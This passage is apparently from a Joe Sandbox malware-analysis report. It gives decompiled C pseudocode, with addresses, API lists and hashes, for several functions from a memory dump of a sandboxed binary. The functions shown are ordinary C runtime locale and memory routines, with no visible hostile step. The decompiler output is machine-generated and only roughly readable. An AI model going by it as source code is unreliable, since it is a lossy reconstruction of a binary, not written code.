                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E009B842D(intOrPtr _a4) {
                                                          				intOrPtr _t15;
                                                          				intOrPtr _t54;
                                                          				void* _t56;
                                                          				void* _t57;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				void* _t61;
                                                          				void* _t62;
                                                          				void* _t63;
                                                          				void* _t64;
                                                          				void* _t65;
                                                          				void* _t66;
                                                          				void* _t67;
                                                          				void* _t68;
                                                          
                                                          				_t54 = _a4;
                                                          				if(_t54 != 0) {
                                                          					_t2 = _t54 + 0xc; // 0xf000000
                                                          					_t56 =  *_t2 -  *0x9cee34; // 0x9d0054
                                                          					if(_t56 != 0) {
                                                          						E009B2248(_t16);
                                                          					}
                                                          					_t3 = _t54 + 0x10; // 0x254804b7
                                                          					_t57 =  *_t3 -  *0x9cee38; // 0x9d0054
                                                          					if(_t57 != 0) {
                                                          						E009B2248(_t17);
                                                          					}
                                                          					_t4 = _t54 + 0x14; // 0x8000
                                                          					_t58 =  *_t4 -  *0x9cee3c; // 0x9d0054
                                                          					if(_t58 != 0) {
                                                          						E009B2248(_t18);
                                                          					}
                                                          					_t5 = _t54 + 0x18; // 0xfc7d80
                                                          					_t59 =  *_t5 -  *0x9cee40; // 0x9d0054
                                                          					if(_t59 != 0) {
                                                          						E009B2248(_t19);
                                                          					}
                                                          					_t6 = _t54 + 0x1c; // 0x4d8b0774
                                                          					_t60 =  *_t6 -  *0x9cee44; // 0x9d0054
                                                          					if(_t60 != 0) {
                                                          						E009B2248(_t20);
                                                          					}
                                                          					_t7 = _t54 + 0x20; // 0x706183f8
                                                          					_t61 =  *_t7 -  *0x9cee48; // 0x9d0054
                                                          					if(_t61 != 0) {
                                                          						E009B2248(_t21);
                                                          					}
                                                          					_t8 = _t54 + 0x24; // 0x5de58bfd
                                                          					_t62 =  *_t8 -  *0x9cee4c; // 0x9d0054
                                                          					if(_t62 != 0) {
                                                          						E009B2248(_t22);
                                                          					}
                                                          					_t9 = _t54 + 0x38; // 0x5d595900
                                                          					_t63 =  *_t9 -  *0x9cee60; // 0x9d0058
                                                          					if(_t63 != 0) {
                                                          						E009B2248(_t23);
                                                          					}
                                                          					_t10 = _t54 + 0x3c; // 0xec8b55c3
                                                          					_t64 =  *_t10 -  *0x9cee64; // 0x9d0058
                                                          					if(_t64 != 0) {
                                                          						E009B2248(_t24);
                                                          					}
                                                          					_t11 = _t54 + 0x40; // 0x10368
                                                          					_t65 =  *_t11 -  *0x9cee68; // 0x9d0058
                                                          					if(_t65 != 0) {
                                                          						E009B2248(_t25);
                                                          					}
                                                          					_t12 = _t54 + 0x44; // 0x875ff00
                                                          					_t66 =  *_t12 -  *0x9cee6c; // 0x9d0058
                                                          					if(_t66 != 0) {
                                                          						E009B2248(_t26);
                                                          					}
                                                          					_t13 = _t54 + 0x48; // 0x401e8
                                                          					_t67 =  *_t13 -  *0x9cee70; // 0x9d0058
                                                          					if(_t67 != 0) {
                                                          						E009B2248(_t27);
                                                          					}
                                                          					_t14 = _t54 + 0x4c; // 0x5d595900
                                                          					_t15 =  *_t14;
                                                          					_t68 = _t15 -  *0x9cee74; // 0x9d0058
                                                          					if(_t68 != 0) {
                                                          						return E009B2248(_t15);
                                                          					}
                                                          				}
                                                          				return _t15;
                                                          			}



















                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: d88377a96474bbc85065ef84bcc1def7e784c387f8730ae7e200345f44237eb1
                                                          • Instruction ID: 057f278e9541268213c1a9db557a34ad7a81df57b44167fe861174edcd1da78a
                                                          • Opcode Fuzzy Hash: d88377a96474bbc85065ef84bcc1def7e784c387f8730ae7e200345f44237eb1
                                                          • Instruction Fuzzy Hash: 6C213532954604ABC628EB64FE85D9773EEEA083707A44D09F11AD7561CF74FC808625
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E009B7973(void* __ebx, void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				intOrPtr _t12;
                                                          				intOrPtr _t13;
                                                          				intOrPtr _t15;
                                                          				intOrPtr _t22;
                                                          				intOrPtr* _t42;
                                                          
                                                          				if(_a4 > 5 || _a8 == 0) {
                                                          					L4:
                                                          					return 0;
                                                          				} else {
                                                          					_t42 = E009B2280(8, 1);
                                                          					if(_t42 != 0) {
                                                          						_t12 = E009B2280(0xb8, 1);
                                                          						 *_t42 = _t12;
                                                          						__eflags = _t12;
                                                          						if(_t12 != 0) {
                                                          							_t13 = E009B2280(0x220, 1);
                                                          							 *((intOrPtr*)(_t42 + 4)) = _t13;
                                                          							__eflags = _t13;
                                                          							if(_t13 != 0) {
                                                          								E009B7488( *_t42, 0x9ce800);
                                                          								_t15 = E009B7D73(__ebx, __edx, 1, _t42, __fp0,  *_t42, _a4, _a8);
                                                          								_push( *((intOrPtr*)(_t42 + 4)));
                                                          								__eflags = _t15;
                                                          								if(__eflags == 0) {
                                                          									L14:
                                                          									E009B2248();
                                                          									E009B4248( *_t42);
                                                          									E009B40EE( *_t42);
                                                          									E009B2248(_t42);
                                                          									_t42 = 0;
                                                          									L16:
                                                          									return _t42;
                                                          								}
                                                          								_push( *((intOrPtr*)( *_t42 + 4)));
                                                          								_t22 = E009B48E9(__edx, 1, __eflags);
                                                          								__eflags = _t22;
                                                          								if(_t22 == 0) {
                                                          									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
                                                          									goto L16;
                                                          								}
                                                          								_push( *((intOrPtr*)(_t42 + 4)));
                                                          								goto L14;
                                                          							}
                                                          							E009B2248( *_t42);
                                                          							E009B2248(_t42);
                                                          							L8:
                                                          							goto L3;
                                                          						}
                                                          						E009B2248(_t42);
                                                          						goto L8;
                                                          					}
                                                          					L3:
                                                          					 *((intOrPtr*)(E009AF100())) = 0xc;
                                                          					goto L4;
                                                          				}
                                                          			}











                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                          • String ID:
                                                          • API String ID: 1503006713-0
                                                          • Opcode ID: 044e6a698d42caf234a8125fa7611d2aaad340f55c744e953543d501a151e4f2
                                                          • Instruction ID: 6dfbdb7a9998d7dbdf7fd9c75472369038a7ed211609ed7ea2d8b9231477365b
                                                          • Opcode Fuzzy Hash: 044e6a698d42caf234a8125fa7611d2aaad340f55c744e953543d501a151e4f2
                                                          • Instruction Fuzzy Hash: 0521053514C605AEEB253FE4DE02FDABBE9DFC1770B204A2DF554950A2EA3199009791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 84%
                                                          			E009B7A4A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, signed int _a8, char _a12) {
                                                          				signed int _v8;
                                                          				signed int _v32;
                                                          				intOrPtr _v36;
                                                          				signed int _v40;
                                                          				void* _t38;
                                                          				signed int _t45;
                                                          				signed int _t60;
                                                          				intOrPtr _t77;
                                                          				void* _t80;
                                                          				intOrPtr* _t82;
                                                          				signed int _t83;
                                                          				signed int _t86;
                                                          				intOrPtr _t88;
                                                          				void* _t92;
                                                          				void* _t98;
                                                          
                                                          				_t98 = __fp0;
                                                          				_t80 = __edx;
                                                          				_push(__ebx);
                                                          				_push(__esi);
                                                          				_t86 = 0;
                                                          				if(_a12 <= 0) {
                                                          					L5:
                                                          					return _t38;
                                                          				} else {
                                                          					_push(__edi);
                                                          					_t82 =  &_a12;
                                                          					while(1) {
                                                          						_t82 = _t82 + 4;
                                                          						_t38 = E009B56BB(_a4, _a8,  *_t82);
                                                          						_t92 = _t92 + 0xc;
                                                          						if(_t38 != 0) {
                                                          							break;
                                                          						}
                                                          						_t86 = _t86 + 1;
                                                          						if(_t86 < _a12) {
                                                          							continue;
                                                          						} else {
                                                          							goto L5;
                                                          						}
                                                          						goto L20;
                                                          					}
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					E009AEB49(0, _t80);
                                                          					asm("int3");
                                                          					_push(0x14);
                                                          					_push(0x9cc560);
                                                          					E009AF1E0(0, _t82, _t86);
                                                          					_t66 = 0;
                                                          					_v32 = 0;
                                                          					__eflags = _a4 - 5;
                                                          					if(_a4 <= 5) {
                                                          						_t88 = E009B0595();
                                                          						_v36 = _t88;
                                                          						E009B42E8(0, _t80, _t82, _t88, __eflags);
                                                          						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
                                                          						_v8 = _v8 & 0;
                                                          						_t83 = E009B2280(0xb8, 1);
                                                          						_v40 = _t83;
                                                          						__eflags = _t83;
                                                          						if(_t83 != 0) {
                                                          							E009B20A9(0xc);
                                                          							_v8 = 1;
                                                          							E009B7488(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
                                                          							_v8 = _v8 & 0x00000000;
                                                          							E009B7BBF();
                                                          							_t66 = E009B7D73(0, _t80, _t83, _t88, _t98, _t83, _a4, _a8);
                                                          							_v32 = _t66;
                                                          							__eflags = _t66;
                                                          							if(_t66 == 0) {
                                                          								E009B4248(_t83);
                                                          								_t43 = E009B40EE(_t83);
                                                          							} else {
                                                          								__eflags = _a8;
                                                          								if(_a8 != 0) {
                                                          									_t60 = E009BDB28(_a8, 0x9ce694);
                                                          									__eflags = _t60;
                                                          									if(_t60 != 0) {
                                                          										 *0x9d0050 = 1;
                                                          									}
                                                          								}
                                                          								E009B20A9(0xc);
                                                          								_v8 = 2;
                                                          								_t25 = _t88 + 0x6c; // 0x6c
                                                          								E009B4368(_t25, _t83);
                                                          								E009B4248(_t83);
                                                          								__eflags =  *(_t88 + 0x70) & 0x00000002;
                                                          								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
                                                          									__eflags =  *0x9cee10 & 0x00000001;
                                                          									if(( *0x9cee10 & 0x00000001) == 0) {
                                                          										E009B4368(0x9ce7fc,  *((intOrPtr*)(_t88 + 0x6c)));
                                                          										_t77 =  *0x9ce7fc; // 0x9ce800
                                                          										_t32 = _t77 + 0x84; // 0x9cee28
                                                          										 *0x9cee20 =  *_t32;
                                                          										_t33 = _t77 + 0x90; // 0x9c8760
                                                          										 *0x9cee7c =  *_t33;
                                                          										_t34 = _t77 + 0x74; // 0x1
                                                          										 *0x9ce690 =  *_t34;
                                                          									}
                                                          								}
                                                          								_v8 = _v8 & 0x00000000;
                                                          								_t43 = E009B7BCE();
                                                          							}
                                                          						}
                                                          						_v8 = 0xfffffffe;
                                                          						E009B7C01(_t43, _t88);
                                                          						_t45 = _t66;
                                                          					} else {
                                                          						 *((intOrPtr*)(E009AF100())) = 0x16;
                                                          						E009AEB1E();
                                                          						_t45 = 0;
                                                          					}
                                                          					return E009AF225(_t45);
                                                          				}
                                                          				L20:
                                                          			}


















                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
                                                          • String ID:
                                                          • API String ID: 2762079118-0
                                                          • Opcode ID: da5503bce7a389e2851da6700a825f1d062d8528cc12023aea641eb43bb90b57
                                                          • Instruction ID: 2b4a53e4bd333c76b9562a8cfe9133d025f0b7c5dce6ab881c47875f43153c8e
                                                          • Opcode Fuzzy Hash: da5503bce7a389e2851da6700a825f1d062d8528cc12023aea641eb43bb90b57
                                                          • Instruction Fuzzy Hash: E141D132908309AFDB10AFE4DA42BDDB7E8EFC4334F10862DF91596182DB759641EB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E009A513D(void* __eax, void* __ebx) {
                                                          				intOrPtr _t5;
                                                          				intOrPtr _t6;
                                                          				intOrPtr _t7;
                                                          				intOrPtr _t8;
                                                          				void* _t13;
                                                          				void* _t23;
                                                          				intOrPtr* _t25;
                                                          				signed int _t26;
                                                          				signed int _t27;
                                                          				intOrPtr _t40;
                                                          
                                                          				_t13 = __ebx;
                                                          				__imp__DecodePointer( *0x9d0110);
                                                          				_t25 =  *0x9cf20c; // 0x471f28
                                                          				_t23 = __eax;
                                                          				if(_t25 == 0) {
                                                          					L5:
                                                          					_push(_t13);
                                                          					E009B2248(_t25);
                                                          					_t26 =  *0x9cf208; // 0x0
                                                          					 *0x9cf20c = 0;
                                                          					if(_t26 == 0) {
                                                          						L9:
                                                          						E009B2248(_t26);
                                                          						 *0x9cf208 = 0;
                                                          						E009B2248( *0x9cf204);
                                                          						_t5 = E009B2248( *0x9cf200);
                                                          						_t27 = _t26 | 0xffffffff;
                                                          						 *0x9cf204 = 0;
                                                          						 *0x9cf200 = 0;
                                                          						if(_t23 != _t27) {
                                                          							_t40 =  *0x9d0110; // 0x6986dcdf
                                                          							if(_t40 != 0) {
                                                          								_t5 = E009B2248(_t23);
                                                          							}
                                                          						}
                                                          						__imp__EncodePointer(_t27);
                                                          						 *0x9d0110 = _t5;
                                                          						_t6 =  *0x9cfd10; // 0x0
                                                          						if(_t6 != 0) {
                                                          							E009B2248(_t6);
                                                          							 *0x9cfd10 = 0;
                                                          						}
                                                          						_t7 =  *0x9cfd14; // 0x0
                                                          						if(_t7 != 0) {
                                                          							E009B2248(_t7);
                                                          							 *0x9cfd14 = 0;
                                                          						}
                                                          						_t8 =  *0x9cecec; // 0x471778
                                                          						asm("lock xadd [eax], esi");
                                                          						if(_t27 == 1) {
                                                          							_t8 =  *0x9cecec; // 0x471778
                                                          							if(_t8 != 0x9ceac8) {
                                                          								_t8 = E009B2248(_t8);
                                                          								 *0x9cecec = 0x9ceac8;
                                                          							}
                                                          						}
                                                          						return _t8;
                                                          					}
                                                          					while( *_t26 != 0) {
                                                          						E009B2248( *_t26);
                                                          						_t26 = _t26 + 4;
                                                          						if(_t26 != 0) {
                                                          							continue;
                                                          						}
                                                          						break;
                                                          					}
                                                          					_t26 =  *0x9cf208; // 0x0
                                                          					goto L9;
                                                          				} else {
                                                          					while( *_t25 != 0) {
                                                          						E009B2248( *_t25);
                                                          						_t25 = _t25 + 4;
                                                          						if(_t25 != 0) {
                                                          							continue;
                                                          						}
                                                          						break;
                                                          					}
                                                          					_t25 =  *0x9cf20c; // 0x471f28
                                                          					goto L5;
                                                          				}
                                                          			}














                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 3064303923-0
                                                          • Opcode ID: 74ccf8ab6e0153cd3e75a333bd0dd067a2f7325259ecf5a7f5418adf0dd7ded3
                                                          • Instruction ID: 3cdadf9e88027997c62150ad835ac5599d8a008d718cf249fdcea32ed51fca6b
                                                          • Opcode Fuzzy Hash: 74ccf8ab6e0153cd3e75a333bd0dd067a2f7325259ecf5a7f5418adf0dd7ded3
                                                          • Instruction Fuzzy Hash: AD21B137D692118BE725AF14FE50E9A7369F781730354063EF93493275CB346C40AB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E009A5649(intOrPtr* __eax, short __ebx, void* __ecx, void* __edx, intOrPtr* __esi) {
                                                          				void* _t45;
                                                          				signed int _t47;
                                                          				intOrPtr* _t51;
                                                          				void* _t59;
                                                          				signed short _t60;
                                                          				void* _t62;
                                                          				void* _t63;
                                                          				void* _t64;
                                                          				void* _t71;
                                                          				void* _t78;
                                                          				void* _t80;
                                                          				void* _t95;
                                                          				intOrPtr* _t98;
                                                          				void* _t99;
                                                          				signed int _t100;
                                                          				void* _t102;
                                                          				void* _t103;
                                                          				void* _t106;
                                                          				void* _t107;
                                                          				void* _t108;
                                                          				void* _t109;
                                                          				void* _t123;
                                                          
                                                          				_t97 = __esi;
                                                          				_t93 = __edx;
                                                          				_t79 = __ebx;
                                                          				asm("adc eax, [ecx+0x682af3]");
                                                          				 *((intOrPtr*)(__ecx + 0x5be9f3)) =  *((intOrPtr*)(__ecx + 0x5be9f3)) + __eax;
                                                          				 *((intOrPtr*)(__ecx + 0xa881e9)) =  *((intOrPtr*)(__ecx + 0xa881e9)) + __eax;
                                                          				 *((intOrPtr*)(__ecx - 0x7f)) =  *((intOrPtr*)(__ecx - 0x7f)) + __ecx;
                                                          				 *__eax =  *__eax + __eax;
                                                          				_t103 = _t102 + 0xc;
                                                          				if(__eax == 0) {
                                                          					if(E009BA06A(__esi) == 0) {
                                                          						if(E009B5727( *((intOrPtr*)(_t100 - 0x1e8)), 0x55, __ebx, E009B5609(__ebx) + 1) != 0) {
                                                          							goto L28;
                                                          						} else {
                                                          							goto L2;
                                                          						}
                                                          					} else {
                                                          						_t59 = E009B9FDB(__esi, 0x20001004, _t100 - 0x1dc, 2);
                                                          						_t106 = _t103 + 0x10;
                                                          						if(_t59 == 0) {
                                                          							L11:
                                                          							_t60 = GetACP();
                                                          							 *(_t100 - 0x1dc) = _t60;
                                                          						} else {
                                                          							_t60 =  *(_t100 - 0x1dc);
                                                          							if(_t60 == 0) {
                                                          								goto L11;
                                                          							}
                                                          						}
                                                          						 *_t94 = _t60 & 0x0000ffff;
                                                          						_t94 =  *((intOrPtr*)(_t100 - 0x1e4)) + 1;
                                                          						_t62 = E009B5727( *((intOrPtr*)(_t100 - 0x1d4)), 0x83, _t97,  *((intOrPtr*)(_t100 - 0x1e4)) + 1);
                                                          						_t107 = _t106 + 0x10;
                                                          						if(_t62 != 0) {
                                                          							goto L28;
                                                          						} else {
                                                          							_t63 = E009B5727(_t79,  *((intOrPtr*)(_t100 + 0x18)), _t97, _t94);
                                                          							_t108 = _t107 + 0x10;
                                                          							if(_t63 != 0) {
                                                          								goto L28;
                                                          							} else {
                                                          								_t64 = E009B5727( *((intOrPtr*)(_t100 - 0x1e8)), 0x55, _t97, _t94);
                                                          								_t109 = _t108 + 0x10;
                                                          								if(_t64 != 0) {
                                                          									goto L28;
                                                          								} else {
                                                          									_t94 = 0x83;
                                                          									goto L16;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				} else {
                                                          					_t94 = 0x83;
                                                          					_push(_t100 - 0x1d0);
                                                          					E009B7294(__ebx, __ecx, __edx, 0x83, _t123,  *((intOrPtr*)(_t100 - 0x1d4)), 0x83);
                                                          					_t109 = _t103 + 0xc;
                                                          					if(__ebx == 0) {
                                                          						L16:
                                                          						_t79 = 0;
                                                          						if( *_t97 == 0) {
                                                          							L20:
                                                          							 *((short*)( *((intOrPtr*)(_t100 - 0x1e0)))) = 0;
                                                          							goto L21;
                                                          						} else {
                                                          							_t69 =  *((intOrPtr*)(_t100 - 0x1e4));
                                                          							if( *((intOrPtr*)(_t100 - 0x1e4)) >= _t94) {
                                                          								goto L20;
                                                          							} else {
                                                          								_t71 = E009B5727( *((intOrPtr*)(_t100 - 0x1e0)), _t94, _t97, _t69 + 1);
                                                          								_t109 = _t109 + 0x10;
                                                          								if(_t71 == 0) {
                                                          									L21:
                                                          									_t94 =  *(_t100 - 0x1f0);
                                                          									if(_t94 != 0) {
                                                          										E009B32E0(_t94,  *((intOrPtr*)(_t100 - 0x1d8)), 4);
                                                          										_t109 = _t109 + 0xc;
                                                          									}
                                                          									_t79 =  *((intOrPtr*)(_t100 - 0x1d4));
                                                          									_t97 =  *((intOrPtr*)(_t100 - 0x1ec));
                                                          									if(E009B55AD( *((intOrPtr*)(_t100 - 0x1ec)),  *((intOrPtr*)(_t100 + 0x10)),  *((intOrPtr*)(_t100 - 0x1d4))) != 0) {
                                                          										goto L28;
                                                          									} else {
                                                          										L2:
                                                          										_pop(_t95);
                                                          										_pop(_t99);
                                                          										_pop(_t80);
                                                          										return E009B1E0D(_t80,  *(_t100 - 4) ^ _t100, _t93, _t95, _t99);
                                                          									}
                                                          								} else {
                                                          									_push(0);
                                                          									_push(0);
                                                          									_push(0);
                                                          									_push(0);
                                                          									_push(0);
                                                          									goto L29;
                                                          								}
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t78 = E009B5727(__ebx,  *((intOrPtr*)(_t100 + 0x18)), _t100 - 0xb0, E009B5609(_t100 - 0xb0) + 1);
                                                          						_t109 = _t109 + 0x14;
                                                          						if(_t78 == 0) {
                                                          							goto L16;
                                                          						} else {
                                                          							L28:
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push(0);
                                                          							L29:
                                                          							E009AEB49(_t79, _t93);
                                                          							asm("int3");
                                                          							_push(8);
                                                          							_push(0x9cc538);
                                                          							_t45 = E009AF1E0(_t79, _t94, _t97);
                                                          							_t98 =  *((intOrPtr*)(_t100 + 8));
                                                          							if(_t98 != 0) {
                                                          								_t47 = E009B20A9(0xd);
                                                          								 *(_t100 - 4) =  *(_t100 - 4) & 0x00000000;
                                                          								if( *((intOrPtr*)(_t98 + 4)) != 0) {
                                                          									asm("lock xadd [ecx], eax");
                                                          									if((_t47 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t98 + 4)) != 0x9ceac8) {
                                                          										E009B2248( *((intOrPtr*)(_t98 + 4)));
                                                          									}
                                                          								}
                                                          								 *(_t100 - 4) = 0xfffffffe;
                                                          								E009B78AF();
                                                          								if( *_t98 != 0) {
                                                          									E009B20A9(0xc);
                                                          									 *(_t100 - 4) = 1;
                                                          									E009B4248( *_t98);
                                                          									_t51 =  *_t98;
                                                          									if(_t51 != 0 &&  *_t51 == 0 && _t51 != 0x9ce800) {
                                                          										E009B40EE(_t51);
                                                          									}
                                                          									 *(_t100 - 4) = 0xfffffffe;
                                                          									E009B78BB();
                                                          								}
                                                          								_t45 = E009B2248(_t98);
                                                          							}
                                                          							return E009AF225(_t45);
                                                          						}
                                                          					}
                                                          				}
                                                          			}

























                                                          0x009b77a7
                                                          0x009b77b2
                                                          0x009b77b7
                                                          0x009b77b7
                                                          0x009b77ba
                                                          0x009b77c0
                                                          0x009b77d5
                                                          0x00000000
                                                          0x009b77d7
                                                          0x009b757b
                                                          0x009b757e
                                                          0x009b757f
                                                          0x009b7582
                                                          0x009b758b
                                                          0x009b758b
                                                          0x009b778d
                                                          0x009b778d
                                                          0x009b778e
                                                          0x009b778f
                                                          0x009b7790
                                                          0x009b7791
                                                          0x00000000
                                                          0x009b7791
                                                          0x009b778b
                                                          0x009b7775
                                                          0x009b7694
                                                          0x009b76ad
                                                          0x009b76b2
                                                          0x009b76b7
                                                          0x00000000
                                                          0x009b76bd
                                                          0x009b7800
                                                          0x009b7802
                                                          0x009b7803
                                                          0x009b7804
                                                          0x009b7805
                                                          0x009b7806
                                                          0x009b7807
                                                          0x009b7807
                                                          0x009b780c
                                                          0x009b780d
                                                          0x009b780f
                                                          0x009b7814
                                                          0x009b7819
                                                          0x009b781e
                                                          0x009b7826
                                                          0x009b782c
                                                          0x009b7835
                                                          0x009b783a
                                                          0x009b783e
                                                          0x009b784c
                                                          0x009b7851
                                                          0x009b783e
                                                          0x009b7852
                                                          0x009b7859
                                                          0x009b7861
                                                          0x009b7865
                                                          0x009b786b
                                                          0x009b7874
                                                          0x009b787a
                                                          0x009b787e
                                                          0x009b788d
                                                          0x009b7892
                                                          0x009b7893
                                                          0x009b789a
                                                          0x009b789a
                                                          0x009b78a0
                                                          0x009b78a5
                                                          0x009b78ab
                                                          0x009b78ab
                                                          0x009b76b7
                                                          0x009b768e

                                                          APIs
                                                          • GetACP.KERNEL32(?,?,?,?,?,00000004,?,00000000), ref: 009B76FC
                                                          • _memmove.LIBCMT ref: 009B77B2
                                                          • __invoke_watson.LIBCMT ref: 009B7807
                                                          • __lock.LIBCMT ref: 009B7826
                                                          • _free.LIBCMT ref: 009B784C
                                                          • __lock.LIBCMT ref: 009B7865
                                                          • ___removelocaleref.LIBCMT ref: 009B7874
                                                          • ___freetlocinfo.LIBCMT ref: 009B788D
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4124
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4142
                                                            • Part of subcall function 009B40EE: ___free_lconv_num.LIBCMT ref: 009B414D
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4157
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4162
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4183
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4196
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B41A4
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B41AF
                                                            • Part of subcall function 009B40EE: ___free_lc_time.LIBCMT ref: 009B41CD
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B41D8
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B4203
                                                            • Part of subcall function 009B40EE: _free.LIBCMT ref: 009B420A
                                                          • _free.LIBCMT ref: 009B78A0
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$__lock$___free_lc_time___free_lconv_num___freetlocinfo___removelocaleref__invoke_watson_memmove
                                                          • String ID:
                                                          • API String ID: 936943993-0
                                                          • Opcode ID: b4b7c366daa6f6ee2bd62e072f5956348ecf630baebd4094ba1a454d3a09e311
                                                          • Instruction ID: dae69ce64a2128626101bf60fecb98a9483d1b887915a57213a6b28aead9c9f5
                                                          • Opcode Fuzzy Hash: b4b7c366daa6f6ee2bd62e072f5956348ecf630baebd4094ba1a454d3a09e311
                                                          • Instruction Fuzzy Hash: 41210971509304ABDB34ABE08F8ABE9B768AFC0330F58076DF415D6092DB35CA40C751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E009B12B6(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                          				signed int _t14;
                                                          				signed int _t15;
                                                          				signed int _t18;
                                                          				void* _t20;
                                                          				void* _t21;
                                                          				signed short* _t22;
                                                          				signed int _t23;
                                                          				void* _t24;
                                                          				void* _t30;
                                                          				signed short* _t32;
                                                          				signed int _t34;
